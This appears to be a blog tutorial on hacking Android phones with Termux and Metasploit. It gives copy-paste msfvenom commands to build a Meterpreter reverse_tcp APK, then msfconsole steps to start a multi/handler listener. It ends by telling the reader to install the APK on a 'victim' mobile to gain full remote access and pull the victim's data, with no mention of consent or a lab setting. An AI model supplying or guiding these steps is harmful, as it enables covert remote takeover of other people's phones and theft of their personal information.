How to hack android phone with termux using metasploit

 Hello guy’s in this article we are going to discuss about how to hack android phone with termux and using metasploit tool.you just follow the steps one by one it’s work perfectly.

First of all install metasploit tool in your termux with help of this below command if you use linux means this tool pre-installed so just open it.

pkg install metasploit

Step 1:

First you type this below command this command will help you to make android raw payload in termux or linux terminal.
Termux

msfvenom -p android/meterpreter/reverse_tcp LHOST=(your localhost ip) LPORT=4444 R >/data/data/com.termux/files/home/storage/shared/Android.apk

Just you copy past this above command in your termux application with in minutes you will make raw android paylod if this command make any error means just type this below command before using this above command.

termux-setup-storage

Once you make android raw payload go to your Go to your internal storage open shared folder see your android payload. 

Linux

msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 R > android.apk

Just copy past this above command in your linux to make android raw payload.

NOTE

You should remember the given LHOST and LPORT

Step 2:

Now open your metasploit tool in your termux or linux so type this below command this command will help you to open metasploit tool.

msfconsole

It will take upto 5 minutes time so wait until it will open.

 Step 2:

Now type this below command this command will help you to start the multi handler in metasploit

use exploit/multi/handler

Step 3:

Now type this below command this command will help you to set the your payload

set payload android/meterpreter/reverse_tcp

Step 4:

Now type this below command this command will help you to set listener host

set LHOST (you local ip address)

Step 5:

Once you set the LHOST type this below command this command will help you to set the LPORT

set LPORT 4444

Step 6:

Once you set LPORT and LHOST type this below command this command will help you to start listener

exploit 

Step 7:

Now install your payload in victim mobile once you installed your meterpreter session will be open so you can able to remote access your victim mobile.

Step 8:

Now you type help command on your termux or linux terminal you can see all remote access command’s.

Now you choose command which information you want to get data on your victim mobile phone. this payload will help you to access your victim mobile completely.  

Post a Comment

Previous Post Next Post